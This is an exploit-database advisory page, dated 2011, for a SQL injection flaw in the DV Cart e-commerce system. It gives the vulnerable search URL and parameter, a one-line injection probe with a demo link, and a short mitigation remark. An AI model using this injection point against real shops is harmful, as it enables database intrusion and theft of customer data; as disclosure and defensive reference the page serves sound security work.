header-logo
Suggest Exploit
vendor:
DV Cart (E-Commerce System)
by:
Eyup CELIK
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DV Cart (E-Commerce System)
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All versions are Vulnerability
2011

DV Cart (E-Commerce System) SQL Injection

SQL Injection can be done using the command input. An example of this is index.php?keyword=<SQL Injection Code>&mod=search&submit=GO. A demo of this exploit can be seen at http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO.

Mitigation:

Input validation and sanitization should be done to prevent SQL Injection.
Source

Exploit-DB raw data:

# Exploit Title: DV Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.esmistudio.com
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Example
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO

Exploit:
index.php?keyword='1&mod=search&submit=GO

Demo:
http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO